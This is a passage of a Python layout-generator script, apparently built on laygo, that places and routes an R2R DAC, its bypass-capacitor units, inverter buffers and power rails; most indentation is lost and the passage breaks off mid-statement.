laygen.via(None, laygen.get_inst_pin_xy(itgate.name, 'ENB', rg_m3m4, index=[i, 0])[0] + [0, 2], rg_m3m4)
# VDD/VSS rails
rvdd = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, y0]), xy1=np.array([x0, y0]), gridname0=rg_m2m3)
rvss = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([x0, 0]), gridname0=rg_m2m3)
# pins
laygen.pin_from_rect('EN', laygen.layers['pin'][4], ren, rg_m3m4)
laygen.pin_from_rect('ENB', laygen.layers['pin'][4], renb, rg_m3m4)
laygen.pin_from_rect('VDD', laygen.layers['pin'][2], rvdd, rg_m2m3)
laygen.pin_from_rect('VSS', laygen.layers['pin'][2], rvss, rg_m2m3)
laygen.pin(name='I', layer=laygen.layers['pin'][3],
xy=laygen.get_inst_pin_xy(itgate.name, 'I', rg_m3m4, index=[0, 0]), gridname=rg_m3m4)
laygen.pin(name='O', layer=laygen.layers['pin'][3],
xy=laygen.get_inst_pin_xy(itgate.name, 'O', rg_m3m4, index=[m_series-1, 0]), gridname=rg_m3m4)
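# illustrative call of the unit generator (a sketch; pg/rg_m2m3/rg_m3m4 and
# logictemplib are assumed to be the grid/template names this script binds
# in its __main__ block):
#   generate_r2rdac_unit(laygen, 'R2RU0', logictemplib, pg, rg_m2m3, rg_m3m4,
#                        m=2, m_series=4)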
def generate_r2r_dac(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m2m3, routing_grid_m3m4,
rg_m3m4_basic_thick, rg_m4m5_thick, num_bits=9, origin=np.array([0, 0])):
"""generate r2rdac """
inv_name='inv_2x'
tap_name='tap'
r2r_unit_name='r2r_dac_unit'
r2r_unit_half_name='r2r_dac_unit_half'
pg = placement_grid
rg_m2m3 = routing_grid_m2m3
rg_m3m4 = routing_grid_m3m4
# rg_m4m5 = routing_grid_m4m5
# rg_m4m5_basic_thick = routing_grid_m4m5_basic_thick
# rg_m4m5_thick = routing_grid_m4m5_thick
# rg_m5m6 = routing_grid_m5m6
# rg_m5m6_thick = routing_grid_m5m6_thick
# rg_m5m6_thick_basic = routing_grid_m5m6_thick_basic
# rg_m6m7_thick = routing_grid_m6m7_thick
#boundaries
x0=laygen.templates.get_template('capdac', workinglib).xy[1][0] - \
laygen.templates.get_template('boundary_bottomleft').xy[1][0]*2
m_bnd_float = x0 / laygen.templates.get_template('boundary_bottom').xy[1][0]
m_bnd = int(m_bnd_float)
if not m_bnd_float == m_bnd:
m_bnd += 1
devname_bnd_left = []
devname_bnd_right = []
transform_bnd_left = []
transform_bnd_right = []
num_row=num_bits*4
for i in range(num_row):
if i%2==0:
devname_bnd_left += ['nmos4_fast_left', 'pmos4_fast_left']
devname_bnd_right += ['nmos4_fast_right', 'pmos4_fast_right']
transform_bnd_left += ['R0', 'MX']
transform_bnd_right += ['R0', 'MX']
else:
devname_bnd_left += ['pmos4_fast_left', 'nmos4_fast_left']
devname_bnd_right += ['pmos4_fast_right', 'nmos4_fast_right']
transform_bnd_left += ['R0', 'MX']
transform_bnd_right += ['R0', 'MX']
[bnd_bottom, bnd_top, bnd_left, bnd_right] = generate_boundary(laygen, objectname_pfix='BND0',
placement_grid=pg,
devname_bottom=['boundary_bottomleft',
'boundary_bottom',
'boundary_bottomright'],
shape_bottom=[np.array([1, 1]), np.array([m_bnd, 1]),
np.array([1, 1])],
devname_top=['boundary_topleft', 'boundary_top',
'boundary_topright'],
shape_top=[np.array([1, 1]), np.array([m_bnd, 1]),
np.array([1, 1])],
devname_left=devname_bnd_left,
transform_left=transform_bnd_left,
devname_right=devname_bnd_right,
transform_right=transform_bnd_right,
origin=np.array([0, 0]))
#Calculate layout size
array_origin = origin + laygen.get_template_xy(name='boundary_bottomleft', gridname=pg, libname=utemplib)
tapr_origin = np.array([laygen.get_template_xy(name='capdac', gridname=pg, libname=workinglib)[0], 0]) \
+ np.array([0, laygen.get_template_xy(name='boundary_bottomleft', gridname=pg, libname=utemplib)[1]]) \
- np.array([laygen.get_template_xy(name='boundary_bottomleft', gridname=pg, libname=utemplib)[0], 0]) \
- np.array([laygen.get_template_xy(name=tap_name, gridname=pg, libname=templib_logic)[0], 0])
# placement
itapl = []
for i in range(num_row):
if i%2 == 0: tf='R0'
else: tf='MX'
if i == 0:
itapl.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPL'+str(i), templatename=tap_name,
gridname=pg, refinstname=None, xy=array_origin, template_libname=templib_logic))
else:
itapl.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPL'+str(i), templatename=tap_name,
gridname=pg, refinstname=itapl[-1].name, template_libname=templib_logic, direction='top', transform=tf))
itapr = []
for i in range(num_row):
if i%2 == 0: tf='R0'
else: tf='MX'
if i == 0:
itapr.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPR'+str(i), templatename=tap_name,
gridname=pg, refinstname=None, xy=tapr_origin, template_libname=templib_logic))
else:
itapr.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPR'+str(i), templatename=tap_name,
gridname=pg, refinstname=itapr[-1].name, template_libname=templib_logic, direction='top', transform=tf))
i2rvdd = []
for i in range(num_bits):
if i == 0:
i2rvdd.append(laygen.relplace(name="I" + objectname_pfix + 'I2RVDD'+str(i), templatename=r2r_unit_name,
gridname=pg, refinstname=itapl[2].name, template_libname=workinglib))
else:
i2rvdd.append(laygen.relplace(name="I" + objectname_pfix + 'I2RVDD'+str(i), templatename=r2r_unit_name,
xy=np.array([0, 3*laygen.get_template_xy(name=r2r_unit_name, gridname=pg, libname=workinglib)[1]]),
gridname=pg, refinstname=i2rvdd[-1].name, template_libname=workinglib, direction='top'))
ir = []
for i in range(num_bits):
if i == 0:
ir.append(laygen.relplace(name="I" + objectname_pfix + 'IR'+str(i), templatename=r2r_unit_name,
gridname=pg, refinstname=itapl[1].name, template_libname=workinglib, transform='MX'))
# elif i == 0:
# ir.append(laygen.relplace(name="I" + objectname_pfix + 'IR'+str(i), templatename=r2r_unit_name,
# gridname=pg, refinstname=itapl[4*(num_bits-1)+1].name, template_libname=workinglib, direction='right', transform='MX'))
else:
ir.append(laygen.relplace(name="I" + objectname_pfix + 'IR'+str(i), templatename=r2r_unit_half_name,
xy=np.array([0, 0]),
gridname=pg, refinstname=itapl[4*i+1].name, template_libname=workinglib, direction='right', transform='MX'))
i2rvss = []
for i in range(num_bits):
if i == 0:
i2rvss.append(laygen.relplace(name="I" + objectname_pfix + 'I2RVSS'+str(i), templatename=r2r_unit_name,
gridname=pg, refinstname=itapl[0].name, template_libname=workinglib))
else:
i2rvss.append(laygen.relplace(name="I" + objectname_pfix + 'I2RVSS'+str(i), templatename=r2r_unit_name,
xy=np.array([0, 3*laygen.get_template_xy(name=r2r_unit_name, gridname=pg, libname=workinglib)[1]]),
gridname=pg, refinstname=i2rvss[-1].name, template_libname=workinglib, direction='top'))
ibuf0 = []
ibuf1 = []
for i in range(num_bits):
if i == 0:
ibuf0.append(laygen.relplace(name="I" + objectname_pfix + 'IBUF0'+str(i), templatename=inv_name,
gridname=pg, refinstname=itapl[3].name, template_libname=logictemplib, transform='MX'))
else:
ibuf0.append(laygen.relplace(name="I" + objectname_pfix + 'IBUF0'+str(i), templatename=inv_name,
xy=np.array([0, 3*laygen.get_template_xy(name=inv_name, gridname=pg, libname=logictemplib)[1]]),
gridname=pg, refinstname=ibuf0[-1].name, template_libname=logictemplib, direction='top', transform='MX'))
ibuf1.append(laygen.relplace(name="I" + objectname_pfix + 'IBUF1'+str(i), templatename=inv_name,
gridname=pg, refinstname=ibuf0[-1].name, template_libname=logictemplib, transform='MX'))
    # Space calculation: tile the leftover width with as many 4x spacers as
    # fit, then fill the remainder with 1x spacers
space_name = 'space_1x'
space4x_name = 'space_4x'
space_width = laygen.get_template_xy(name = space_name, gridname = pg, libname = templib_logic)[0]
space4_width = laygen.get_template_xy(name = space4x_name, gridname = pg, libname = templib_logic)[0]
blank_2r = laygen.get_inst_xy(itapr[0].name, pg)[0] - laygen.get_inst_bbox(i2rvdd[0].name, pg)[1][0]
blank_r = laygen.get_inst_xy(itapr[1].name, pg)[0] - laygen.get_inst_bbox(ir[1].name, pg)[1][0]
blank_buf = laygen.get_inst_xy(itapr[0].name, pg)[0] - laygen.get_inst_bbox(ibuf1[0].name, pg)[1][0]
m_sp4x_2r = int(blank_2r/space4_width)
m_sp1x_2r = int(blank_2r/space_width)-4*m_sp4x_2r
m_sp4x_r = int(blank_r/space4_width)
m_sp1x_r = int(blank_r/space_width)-4*m_sp4x_r
m_sp4x_buf = int(blank_buf/space4_width)
m_sp1x_buf = int(blank_buf/space_width)-4*m_sp4x_buf
isp_2rvdd_4x = []
isp_2rvss_4x = []
isp_r_4x = []
isp_buf_4x = []
isp_2rvdd_1x = []
isp_2rvss_1x = []
isp_r_1x = []
isp_buf_1x = []
for i in range(num_bits):
isp_2rvdd_4x.append(laygen.relplace(name="I" + objectname_pfix + 'SP2RVDD_4x'+str(i), templatename=space4x_name,
gridname=pg, refinstname=i2rvdd[i].name, template_libname=logictemplib, shape=[m_sp4x_2r, 1], transform='R0'))
isp_2rvdd_1x.append(laygen.relplace(name="I" + objectname_pfix + 'SP2RVDD_1x'+str(i), templatename=space_name,
gridname=pg, refinstname=isp_2rvdd_4x[i].name, template_libname=logictemplib, shape=[m_sp1x_2r, 1], transform='R0'))
isp_2rvss_4x.append(laygen.relplace(name="I" + objectname_pfix + 'SP2RVSS_4x'+str(i), templatename=space4x_name,
gridname=pg, refinstname=i2rvss[i].name, template_libname=logictemplib, shape=[m_sp4x_2r, 1], transform='R0'))
isp_2rvss_1x.append(laygen.relplace(name="I" + objectname_pfix + 'SP2RVSS_1x'+str(i), templatename=space_name,
gridname=pg, refinstname=isp_2rvss_4x[i].name, template_libname=logictemplib, shape=[m_sp1x_2r, 1], transform='R0'))
if i==0:
isp_r_4x.append(laygen.relplace(name="I" + objectname_pfix + 'SPR_4x' + str(i), templatename=space4x_name,
gridname=pg, refinstname=ir[i].name, template_libname=logictemplib,
shape=[m_sp4x_2r, 1], transform='MX'))
isp_r_1x.append(laygen.relplace(name="I" + objectname_pfix + 'SPR_1x' + str(i), templatename=space_name,
gridname=pg, refinstname=isp_r_4x[i].name, template_libname=logictemplib,
shape=[m_sp1x_2r, 1], transform='MX'))
else:
isp_r_4x.append(laygen.relplace(name="I" + objectname_pfix + 'SPR_4x'+str(i), templatename=space4x_name,
gridname=pg, refinstname=ir[i].name, template_libname=logictemplib, shape=[m_sp4x_r, 1], transform='MX'))
isp_r_1x.append(laygen.relplace(name="I" + objectname_pfix + 'SPR_1x'+str(i), templatename=space_name,
gridname=pg, refinstname=isp_r_4x[i].name, template_libname=logictemplib, shape=[m_sp1x_r, 1], transform='MX'))
isp_buf_4x.append(laygen.relplace(name="I" + objectname_pfix + 'SPBUF_4x'+str(i), templatename=space4x_name,
gridname=pg, refinstname=ibuf1[i].name, template_libname=logictemplib, shape=[m_sp4x_buf, 1], transform='MX'))
isp_buf_1x.append(laygen.relplace(name="I" + objectname_pfix + 'SPBUF_1x'+str(i), templatename=space_name,
gridname=pg, refinstname=isp_buf_4x[i].name, template_libname=logictemplib, shape=[m_sp1x_buf, 1], transform='MX'))
    # internal pins
    # (pdict collects every instance's pin coordinates; the routes below end
    #  up querying pins directly, so pdict is effectively unused here)
    pdict = laygen.get_inst_pin_xy(None, None, rg_m3m4)
# routing
# 2RVDD to VDD & 2RVSS to VSS
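        # each 2R cell's input is strapped to its own rail (VDD for the
        # '2rvdd' cells, VSS for the '2rvss' cells); the outputs are routed
        # up to the matching R cell's input in the second loop below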
for i in range(num_bits):
rh0, rv0 = laygen.route_hv(laygen.layers['metal'][2], laygen.layers['metal'][3],
xy0=laygen.get_inst_pin_xy(i2rvdd[i].name, 'VDD', rg_m2m3)[0],
xy1=laygen.get_inst_pin_xy(i2rvdd[i].name, 'I', rg_m2m3)[0], gridname0=rg_m2m3)
rh0, rv0 = laygen.route_hv(laygen.layers['metal'][2], laygen.layers['metal'][3],
xy0=laygen.get_inst_pin_xy(i2rvss[i].name, 'VSS', rg_m2m3)[0],
xy1=laygen.get_inst_pin_xy(i2rvss[i].name, 'I', rg_m2m3)[0], gridname0=rg_m2m3)
x1 = laygen.get_inst_xy(ir[i].name, rg_m3m4)[0]
for i in range(num_bits):
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(i2rvdd[i].name, 'O', rg_m3m4)[0],
laygen.get_inst_pin_xy(ir[i].name, 'I', rg_m4m5)[0]+[2,0],
laygen.get_inst_pin_xy(ir[i].name, 'EN', rg_m3m4)[0][1] + 6, rg_m3m4,
layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
if i == num_bits-1:
laygen.pin_from_rect('out', laygen.layers['pin'][4], rh0, rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(i2rvss[i].name, 'O', rg_m3m4)[0],
laygen.get_inst_pin_xy(ir[i].name, 'I', rg_m4m5)[0]+[2,0],
laygen.get_inst_pin_xy(ir[i].name, 'EN', rg_m3m4)[0][1] - 6, rg_m3m4,
layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
laygen.route(None, laygen.layers['metal'][4], xy0=laygen.get_inst_pin_xy(ir[i].name, 'I', rg_m4m5)[0]+[0,2],
xy1=laygen.get_inst_pin_xy(ir[i].name, 'I', rg_m4m5)[0]+[2,2], gridname0=rg_m3m4, gridname1=rg_m4m5,via0=[0,0], via1=[0,0])
y1 = laygen.get_inst_pin_xy(ir[i].name, 'VDD', rg_m3m4)[0][1]+2
# R path routing
if not i == 0:
rv0, rh0, rv1 = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(ir[i].name, 'O', rg_m3m4)[0],
laygen.get_inst_pin_xy(ir[i-1].name, 'I', rg_m4m5)[0]-[2,-6],
y1, rg_m3m4, layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
rv0, rh0, rv1 = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(ir[i-1].name, 'I', rg_m3m4)[0],
laygen.get_inst_pin_xy(ir[i-1].name, 'I', rg_m4m5)[0]-[2,-6],
laygen.get_inst_pin_xy(ir[i - 1].name, 'I', rg_m3m4)[0][1]+2, rg_m3m4,
layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
else:
# rh0, rv0 = laygen.route_hv(laygen.layers['metal'][2], laygen.layers['metal'][3],
# xy0=laygen.get_inst_pin_xy(ir[i].name, 'VSS', rg_m2m3)[0],
# xy1=laygen.get_inst_pin_xy(ir[i].name, 'O', rg_m2m3)[0], gridname0=rg_m2m3)
rv0, rh0, rv1 = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(ir[i].name, 'O', rg_m3m4)[0],
laygen.get_inst_pin_xy(ir[i].name, 'VSS', rg_m3m4)[1],
laygen.get_inst_pin_xy(ir[i].name, 'O', rg_m3m4)[0][1]-1, rg_m3m4)
laygen.via(None, xy=laygen.get_inst_pin_xy(ir[i].name, 'VSS', rg_m2m3)[1], gridname=rg_m2m3)
# R EN/ENB
rv0, rh0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][2],
xy0=laygen.get_inst_pin_xy(ir[i].name, 'EN', rg_m2m3)[1],
xy1=laygen.get_inst_pin_xy(ir[i].name, 'VDD', rg_m2m3)[0], gridname0=rg_m2m3)
rv0, rh0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][2],
xy0=laygen.get_inst_pin_xy(ir[i].name, 'ENB', rg_m2m3)[1],
xy1=laygen.get_inst_pin_xy(ir[i].name, 'VSS', rg_m2m3)[0], gridname0=rg_m2m3)
# 2R EN/ENB
x_en = laygen.get_inst_pin_xy(ibuf1[i].name, 'O', rg_m3m4)[0][0]+4
x_enb = laygen.get_inst_pin_xy(ibuf1[i].name, 'O', rg_m3m4)[0][0]+2
rv0, rh0, rv1 = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(ibuf1[i].name, 'O', rg_m3m4)[0],
np.array([x_en, laygen.get_inst_pin_xy(i2rvdd[i].name, 'EN', rg_m4m5)[0][1]]),
laygen.get_inst_pin_xy(ibuf1[i].name, 'O', rg_m3m4)[1][1], rg_m3m4,
layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
laygen.via(None, xy=np.array([x_en, laygen.get_inst_pin_xy(i2rvdd[i].name, 'EN', rg_m4m5)[0][1]]), gridname=rg_m4m5)
rv0, rh0, rv1 = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(ibuf1[i].name, 'O', rg_m3m4)[0],
np.array([x_en, laygen.get_inst_pin_xy(i2rvss[i].name, 'ENB', rg_m4m5)[0][1]]),
laygen.get_inst_pin_xy(ibuf1[i].name, 'O', rg_m3m4)[1][1], rg_m3m4,
layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
laygen.via(None, xy=np.array([x_en, laygen.get_inst_pin_xy(i2rvss[i].name, 'ENB', rg_m4m5)[0][1]]), gridname=rg_m4m5)
rv0, rh0, rv1 = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(ibuf0[i].name, 'O', rg_m3m4)[0],
np.array([x_enb, laygen.get_inst_pin_xy(i2rvdd[i].name, 'ENB', rg_m4m5)[0][1]]),
laygen.get_inst_pin_xy(ibuf0[i].name, 'O', rg_m3m4)[0][1], rg_m3m4,
layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
laygen.via(None, xy=np.array([x_enb, laygen.get_inst_pin_xy(i2rvdd[i].name, 'ENB', rg_m4m5)[0][1]]), gridname=rg_m4m5)
rv0, rh0, rv1 = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(ibuf0[i].name, 'O', rg_m3m4)[0],
np.array([x_enb, laygen.get_inst_pin_xy(i2rvss[i].name, 'EN', rg_m4m5)[0][1]]),
laygen.get_inst_pin_xy(ibuf0[i].name, 'O', rg_m3m4)[0][1], rg_m3m4,
layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
laygen.via(None, xy=np.array([x_enb, laygen.get_inst_pin_xy(i2rvss[i].name, 'EN', rg_m4m5)[0][1]]), gridname=rg_m4m5)
# buffer routing
laygen.route(None, laygen.layers['metal'][4], xy0=laygen.get_inst_pin_xy(ibuf0[i].name, 'O', rg_m3m4)[0],
xy1=laygen.get_inst_pin_xy(ibuf1[i].name, 'I', rg_m3m4)[0], gridname0=rg_m3m4, via0=[0,0], via1=[0,0])
# Sel pins
rv0, rsel = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4],
xy0=laygen.get_inst_pin_xy(ibuf0[i].name, 'I', rg_m3m4)[0],
xy1=laygen.get_inst_pin_xy(ibuf0[i].name, 'I', rg_m3m4)[0]+[4,2], gridname0=rg_m3m4)
laygen.pin_from_rect('SEL<'+str(i)+'>', laygen.layers['pin'][4], rsel, rg_m3m4)
# # power
# for i in range(num_row):
# laygen.pin(name='VSS'+str(i), layer=laygen.layers['pin'][2], xy=laygen.get_inst_pin_xy(itapl[i].name, 'VSS', rg_m2m3),
# gridname=rg_m2m3, netname='VSS:')
# laygen.pin(name='VDD'+str(i), layer=laygen.layers['pin'][2], xy=laygen.get_inst_pin_xy(itapl[i].name, 'VDD', rg_m2m3),
# gridname=rg_m2m3, netname='VDD:')
    # power pins: M3 straps over the left/right tap columns, with vias down
    # to each row's VDD/VSS rails
pwr_dim=laygen.get_template_xy(name=itapl[0].cellname, gridname=rg_m2m3, libname=itapl[0].libname)
rvddl_m3 = []
rvssl_m3 = []
rvddr_m3 = []
rvssr_m3 = []
for i in range(0, int(pwr_dim[0]/2)):
rvddl_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapl[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvssl_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+2, 0]), xy1=np.array([2*i+2, 0]), gridname0=rg_m2m3,
refinstname0=itapl[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
for j in range(num_row):
laygen.via(None, xy=np.array([2*i+1, 0]), gridname=rg_m2m3, refinstname=itapl[j].name, refpinname='VDD')
laygen.via(None, xy=np.array([2 * i + 2, 0]), gridname=rg_m2m3, refinstname=itapl[j].name, refpinname='VSS')
# laygen.pin(name = 'VDDL'+str(i), layer = laygen.layers['pin'][3], refobj = rvddl_m3[-1], gridname=rg_m2m3, netname='VDD')
# laygen.pin(name = 'VSSL'+str(i), layer = laygen.layers['pin'][3], refobj = rvssl_m3[-1], gridname=rg_m2m3, netname='VSS')
rvddr_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapr[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvssr_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+2, 0]), xy1=np.array([2*i+2, 0]), gridname0=rg_m2m3,
refinstname0=itapr[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
for j in range(num_row):
laygen.via(None, xy=np.array([2*i+1, 0]), gridname=rg_m2m3, refinstname=itapr[j].name, refpinname='VDD')
laygen.via(None, xy=np.array([2 * i + 2, 0]), gridname=rg_m2m3, refinstname=itapr[j].name, refpinname='VSS')
# laygen.pin(name = 'VDDR'+str(i), layer = laygen.layers['pin'][3], refobj = rvddr_m3[-1], gridname=rg_m2m3, netname='VDD')
# laygen.pin(name = 'VSSR'+str(i), layer = laygen.layers['pin'][3], refobj = rvssr_m3[-1], gridname=rg_m2m3, netname='VSS')
    # M4: horizontal power rails generated from the M3 straps
input_rails_rect = [rvddl_m3, rvssl_m3]
rvddl_m4, rvssl_m4 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='L_M4_',
layer=laygen.layers['metal'][4], gridname=rg_m3m4_basic_thick, netnames=['VDD', 'VSS'], direction='x',
input_rails_rect=input_rails_rect, generate_pin=False, overwrite_start_coord=2, overwrite_end_coord=None,
offset_start_index=0, offset_end_index=0)
x1_phy = laygen.get_xy(obj =bnd_right[0])[0]\
+laygen.get_xy(obj =bnd_right[0].template)[0]
x1 = laygen.grids.get_absgrid_x(rg_m3m4_basic_thick, x1_phy)
input_rails_rect = [rvddr_m3, rvssr_m3]
rvddr_m4, rvssr_m4 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='R_M4_',
layer=laygen.layers['metal'][4], gridname=rg_m3m4_basic_thick, netnames=['VDD', 'VSS'], direction='x',
input_rails_rect=input_rails_rect, generate_pin=False, overwrite_start_coord=None, overwrite_end_coord=x1-2,
offset_start_index=0, offset_end_index=0)
    # M5: vertical power rails (exported as pins) generated from the M4 rails
input_rails_rect = [rvddl_m4, rvssl_m4]
rvddl_m5, rvssl_m5 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='L_M5_',
layer=laygen.layers['pin'][5], gridname=rg_m4m5_thick, netnames=['VDD', 'VSS'], direction='y',
input_rails_rect=input_rails_rect, generate_pin=True, overwrite_start_coord=None, overwrite_end_coord=None,
offset_start_index=0, offset_end_index=0)
y1_phy = laygen.get_xy(obj =bnd_top[0])[1]\
+laygen.get_xy(obj =bnd_top[0].template)[1]
y1 = laygen.grids.get_absgrid_x(rg_m4m5_thick, y1_phy)
input_rails_rect = [rvddr_m4, rvssr_m4]
rvddr_m5, rvssr_m5 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='R_M5_',
layer=laygen.layers['pin'][5], gridname=rg_m4m5_thick, netnames=['VDD', 'VSS'], direction='y',
input_rails_rect=input_rails_rect, generate_pin=True, overwrite_start_coord=None, overwrite_end_coord=None,
offset_start_index=0, offset_end_index=0)
def generate_r2rdac_bcap_unit(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m2m3, routing_grid_m3m4_basic_thick,
m=2, origin=np.array([0, 0])):
pg = placement_grid
rg_m2m3 = routing_grid_m2m3
rg_m3m4_basic_thick = routing_grid_m3m4_basic_thick
bcap_name = 'bcap2_8x'
# placement
ibcap = laygen.place(name="I" + objectname_pfix + 'BCAP0', templatename=bcap_name,
gridname=pg, xy=origin, template_libname=templib_logic, shape=np.array([m,1]))
# reference coordinates
x0 = laygen.get_inst_pin_xy(ibcap.name, 'VDD', rg_m2m3, index=[m-1, 0])[1][0]
y0 = laygen.get_inst_pin_xy(ibcap.name, 'VDD', rg_m2m3, index=[m-1, 0])[1][1]
# internal routes
for i in range(m-1):
laygen.route(None, laygen.layers['metal'][4],
xy0=laygen.get_inst_pin_xy(ibcap.name, 'I', rg_m3m4_basic_thick, index=[i,0])[0],
xy1=laygen.get_inst_pin_xy(ibcap.name, 'I', rg_m3m4_basic_thick, index=[i+1,0])[0],
gridname0=rg_m3m4_basic_thick, via0=[0,0], via1=[0,0])
for i in range(m):
laygen.route(None, laygen.layers['metal'][3],
xy0=np.array([laygen.get_inst_pin_xy(ibcap.name, 'I', rg_m2m3, index=[i,0])[0][0], 0]),
xy1=np.array([laygen.get_inst_pin_xy(ibcap.name, 'I', rg_m2m3, index=[i,0])[0][0], y0]),
gridname0=rg_m2m3)
rin = laygen.route(None, laygen.layers['metal'][4],
xy0=laygen.get_inst_pin_xy(ibcap.name, 'I', rg_m3m4_basic_thick, index=[0, 0])[0],
xy1=laygen.get_inst_pin_xy(ibcap.name, 'I', rg_m3m4_basic_thick, index=[m-1, 0])[0],
gridname0=rg_m3m4_basic_thick)
# VDD/VSS rails
rvdd = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, y0]), xy1=np.array([x0, y0]), gridname0=rg_m2m3)
rvss = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([x0, 0]), gridname0=rg_m2m3)
# pins
laygen.pin_from_rect('I', laygen.layers['pin'][4], rin, rg_m3m4_basic_thick)
laygen.pin_from_rect('VDD', laygen.layers['pin'][2], rvdd, rg_m2m3)
laygen.pin_from_rect('VSS', laygen.layers['pin'][2], rvss, rg_m2m3)
def generate_r2r_dac_bcap(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m2m3, routing_grid_m3m4,
rg_m3m4_basic_thick, rg_m4m5_thick, num_bits=9, origin=np.array([0, 0])):
"""generate r2rdac """
inv_name='inv_2x'
tap_name='tap'
bcap_unit_name='r2r_dac_bcap_unit'
pg = placement_grid
rg_m2m3 = routing_grid_m2m3
rg_m3m4 = routing_grid_m3m4
# rg_m4m5 = routing_grid_m4m5
# rg_m4m5_basic_thick = routing_grid_m4m5_basic_thick
# rg_m4m5_thick = routing_grid_m4m5_thick
# rg_m5m6 = routing_grid_m5m6
# rg_m5m6_thick = routing_grid_m5m6_thick
# rg_m5m6_thick_basic = routing_grid_m5m6_thick_basic
# rg_m6m7_thick = routing_grid_m6m7_thick
#boundaries
x0=laygen.templates.get_template('r2r_dac_bcap_unit', workinglib).xy[1][0] + \
laygen.templates.get_template('tap', templib_logic).xy[1][0]*2
    # number of 'boundary_bottom' tiles needed to span x0 (ceiling division)
    m_bnd_float = x0 / laygen.templates.get_template('boundary_bottom').xy[1][0]
    m_bnd = int(m_bnd_float)
    if m_bnd_float != m_bnd:
        m_bnd += 1
devname_bnd_left = []
devname_bnd_right = []
transform_bnd_left = []
transform_bnd_right = []
num_row=num_bits*4
for i in range(num_row):
if i%2==0:
devname_bnd_left += ['nmos4_fast_left', 'pmos4_fast_left']
devname_bnd_right += ['nmos4_fast_right', 'pmos4_fast_right']
transform_bnd_left += ['R0', 'MX']
transform_bnd_right += ['R0', 'MX']
else:
devname_bnd_left += ['pmos4_fast_left', 'nmos4_fast_left']
devname_bnd_right += ['pmos4_fast_right', 'nmos4_fast_right']
transform_bnd_left += ['R0', 'MX']
transform_bnd_right += ['R0', 'MX']
[bnd_bottom, bnd_top, bnd_left, bnd_right] = generate_boundary(laygen, objectname_pfix='BND0',
placement_grid=pg,
devname_bottom=['boundary_bottomleft',
'boundary_bottom',
'boundary_bottomright'],
shape_bottom=[np.array([1, 1]), np.array([m_bnd, 1]),
np.array([1, 1])],
devname_top=['boundary_topleft', 'boundary_top',
'boundary_topright'],
shape_top=[np.array([1, 1]), np.array([m_bnd, 1]),
np.array([1, 1])],
devname_left=devname_bnd_left,
transform_left=transform_bnd_left,
devname_right=devname_bnd_right,
transform_right=transform_bnd_right,
origin=np.array([0, 0]))
#Calculate layout size
array_origin = origin + laygen.get_template_xy(name='boundary_bottomleft', gridname=pg, libname=utemplib)
tapr_origin = np.array([laygen.get_template_xy(name='r2r_dac_bcap_unit', gridname=pg, libname=workinglib)[0], 0]) \
+ np.array([0, laygen.get_template_xy(name='boundary_bottomleft', gridname=pg, libname=utemplib)[1]]) \
+ np.array([laygen.get_template_xy(name='boundary_bottomleft', gridname=pg, libname=utemplib)[0], 0]) \
